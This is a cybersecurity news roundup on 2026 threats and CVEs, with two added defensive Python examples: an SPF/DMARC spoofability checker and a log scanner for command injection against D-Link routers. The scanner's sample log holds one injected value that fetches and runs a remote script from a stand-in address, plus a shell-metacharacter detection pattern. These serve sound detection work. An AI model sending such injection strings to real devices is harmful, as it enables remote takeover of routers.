
Daily Cybersecurity Roundup, January 07, 2026

Cyber threats escalated sharply in 2025, with state-linked actors, malicious software, and financial scams exploiting vulnerabilities across critical infrastructure, personal devices, and digital payment systems. Chinese state-linked hackers averaged 2.63 million daily attacks on Taiwan’s critical infrastructure, targeting energy, healthcare, and communications via ransomware and unpatched systems, led by BlackTech and APT41. Over 900,000 users were hit by malicious Chrome extensions impersonating AITOPIA AI, stealing ChatGPT and DeepSeek data, while Bitcoin ATM scams cost Americans $333 million, with older adults disproportionately targeted through fake government calls, tech support, and family emergency scams. Continue reading for more cybersecurity updates.

01

Chinese state-linked hackers are targeting Taiwan’s critical infrastructure with 2.63 million daily attacks in 2025 (up 6% YoY), hitting energy, healthcare, and communications via ransomware and unpatched systems, led by groups like BlackTech and APT41.

02

Malicious Chrome extensions impersonating the AITOPIA AI sidebar have compromised over 900,000 users by exfiltrating ChatGPT and DeepSeek conversations to attacker-controlled servers every 30 minutes.

03

The Black Cat hacker group has been using fake Notepad++ websites to distribute malware and steal data through social engineering and SEO manipulation.

04

Phishing actors are abusing email routing misconfigurations to spoof internal domains and deliver convincing phishing emails, using phishing-as-a-service (PhaaS) platforms such as Tycoon2FA for credential theft, financial fraud, and adversary-in-the-middle (AiTM) attacks.
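Whether a spoofed internal domain reaches the inbox depends heavily on what the domain's own SPF and DMARC records tell receivers to do. The following added example (not code from the roundup, the PhaaS operators, or any vendor) evaluates the posture of a few constructed domains from constructed TXT records; in practice the records would come from a DNS resolver, and the domain names here are placeholders.

```python
"""Evaluate a domain's SPF/DMARC posture for spoofability.

Added example, not from the original page. The DNS data below is
constructed for illustration; replace lookup_txt() with a real
resolver query (e.g. dnspython) to run it against live domains.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed TXT records, keyed by the DNS name that would be queried.
CONSTRUCTED_DNS = {
    "example.test": ["v=spf1 include:_spf.mailhost.test ~all"],
    "_dmarc.example.test": ["v=DMARC1; p=none; rua=mailto:dmarc@example.test"],
    "lax.test": ["v=spf1 +all"],
    # lax.test deliberately has no _dmarc record.
    "strict.test": ["v=spf1 ip4:203.0.113.0/24 -all"],
    "_dmarc.strict.test": ["v=DMARC1; p=reject; adkim=s; aspf=s; pct=100"],
}


@dataclass
class Posture:
    domain: str
    spf: Optional[str]
    dmarc_policy: Optional[str]
    findings: list = field(default_factory=list)


def lookup_txt(name: str, dns=CONSTRUCTED_DNS) -> list:
    """Stand-in for a DNS TXT query (constructed data)."""
    return dns.get(name, [])


def parse_dmarc(record: str) -> dict:
    """Split 'v=DMARC1; p=reject; pct=100' into a tag dictionary."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess(domain: str, dns=CONSTRUCTED_DNS) -> Posture:
    spf_records = [r for r in lookup_txt(domain, dns)
                   if r.lower().startswith("v=spf1")]
    dmarc_records = [r for r in lookup_txt(f"_dmarc.{domain}", dns)
                     if r.upper().startswith("V=DMARC1")]
    posture = Posture(domain, spf_records[0] if spf_records else None, None)

    if not spf_records:
        posture.findings.append("no SPF record: any host can claim to send for this domain")
    elif len(spf_records) > 1:
        posture.findings.append("multiple SPF records: receivers treat this as a permanent error")
    else:
        spf = spf_records[0].lower()
        # The 'all' mechanism's qualifier decides what happens to unlisted senders.
        if re.search(r"\s\+?all(\s|$)", spf):
            posture.findings.append("SPF ends in +all: every sender passes")
        elif re.search(r"\s~all(\s|$)", spf):
            posture.findings.append("SPF softfail (~all): spoofed mail is marked, not rejected")
        elif re.search(r"\s\?all(\s|$)", spf):
            posture.findings.append("SPF neutral (?all): equivalent to no policy")

    if not dmarc_records:
        posture.findings.append("no DMARC record: SPF/DKIM failures are not enforced on the From: domain")
    else:
        tags = parse_dmarc(dmarc_records[0])
        posture.dmarc_policy = tags.get("p")
        if posture.dmarc_policy in (None, "none"):
            posture.findings.append("DMARC p=none: monitoring only, spoofed mail is still delivered")
        if posture.dmarc_policy in ("quarantine", "reject") and tags.get("pct", "100") != "100":
            posture.findings.append(f"DMARC pct={tags['pct']}: policy applied to only part of failing mail")

    return posture


if __name__ == "__main__":
    for name in ("example.test", "lax.test", "strict.test"):
        result = assess(name)
        print(name, result.dmarc_policy, result.findings)
```

The check is the same one receivers perform on the visible From: domain, so a domain whose own records come back with findings is one attackers can spoof with little friction; an empty findings list (as for the constructed strict.test) is the posture to aim for on internal domains.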

05

The FBI reports at least $333 million in losses from Bitcoin ATM scams in 2025, with older adults disproportionately targeted through fake government calls, tech support scams, and family emergency ruses.

06

Hackers are actively exploiting a critical RCE vulnerability (CVE-2026-0625) in legacy D-Link DSL routers, abusing improper input sanitization in the dnscfg.cgi endpoint to execute arbitrary shell commands without authentication.
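For defenders who cannot immediately retire the affected routers, the practical question is whether anyone has already sent command-injection attempts to that endpoint. The following added example (not code from the roundup or from D-Link) scans constructed access-log lines for requests to dnscfg.cgi whose parameter values carry shell metacharacters. The exact path and parameter names of the real endpoint are assumptions; the metacharacter list is a generic shell-injection heuristic, not the vulnerability's actual payload format.

```python
"""Flag access-log lines that look like command injection against dnscfg.cgi.

Added detection example, not from the original page or from D-Link.
Log lines are constructed; parameter names are assumed for illustration.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined-log-format request line: "METHOD PATH HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Sequences that end a value and start a new shell command.
SHELL_META_RE = re.compile(r"[;|`]|\$\(|\$\{|\n|%0a|&&|\|\|", re.IGNORECASE)

ENDPOINT = "/dnscfg.cgi"  # assumed path; adjust to the device's real URL

# Constructed sample log lines (RFC 5737 test addresses).
CONSTRUCTED_LOGS = [
    '203.0.113.5 - - [07/Jan/2026:10:01:02 +0000] '
    '"GET /dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=1.1.1.1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [07/Jan/2026:10:01:09 +0000] '
    '"GET /dnscfg.cgi?dnsPrimary=8.8.8.8%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx%3Bsh%20x HTTP/1.1" 200 512',
    '198.51.100.7 - - [07/Jan/2026:10:01:15 +0000] "POST /dnscfg.cgi HTTP/1.1" 200 512',
    '192.0.2.9 - - [07/Jan/2026:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]


def suspicious(line: str):
    """Return a hit dictionary for a suspicious request to the endpoint, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    parts = urlsplit(match.group("path"))
    if not parts.path.endswith(ENDPOINT):
        return None
    src = line.split(" ", 1)[0]

    # Inspect parameter values rather than the raw query string: '&' is a
    # legitimate separator there and would otherwise be a false positive.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already decoded once; a second pass catches double-encoding.
        for candidate in (value, unquote(value)):
            if SHELL_META_RE.search(candidate):
                return {"src": src, "param": key, "value": value,
                        "reason": "shell metacharacter in parameter value"}

    # POST bodies are not in access logs, so they cannot be inspected here;
    # surface them as lower-confidence hits for review against device logs.
    if match.group("method") == "POST":
        return {"src": src, "param": None, "value": None,
                "reason": "POST to endpoint; body not logged, review separately"}
    return None


def scan(lines):
    """Run suspicious() over an iterable of log lines and collect the hits."""
    return [hit for hit in (suspicious(line) for line in lines) if hit]


if __name__ == "__main__":
    for hit in scan(CONSTRUCTED_LOGS):
        print(hit)
```

Routers of this class rarely forward their own web-server logs, so in practice the same check is run against whatever upstream proxy, IDS or NetFlow-derived HTTP metadata sees traffic to the device; the parsing is the same, only the input source changes.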

07

Veeam disclosed four high-impact vulnerabilities in Backup & Replication v13 that could enable RCE or root-level access, including CVE-2025-55125 (RCE as root), CVE-2025-59470 (RCE as PostgreSQL user), CVE-2025-59469 (arbitrary file write as root), and CVE-2025-59468 (RCE via password parameters).

08

A high-severity vulnerability (CVE-2025-64496) in Open WebUI versions 0.6.34 and older allows potential account takeovers and server compromises when the Direct Connections feature is enabled.

09

Dolby patched a critical zero-click RCE vulnerability (CVE-2025-54957) in the Dolby Digital Plus Unified Decoder, with Google addressing it for Pixel devices in December 2025 and rolling it out across all Android devices in January 2026.

10

A vulnerability in the TOTOLINK EX200 extender's firmware-upload error handling lets a remote authenticated attacker trigger a failure path that unintentionally starts an unauthenticated root-level telnet service, giving full system access to the device.
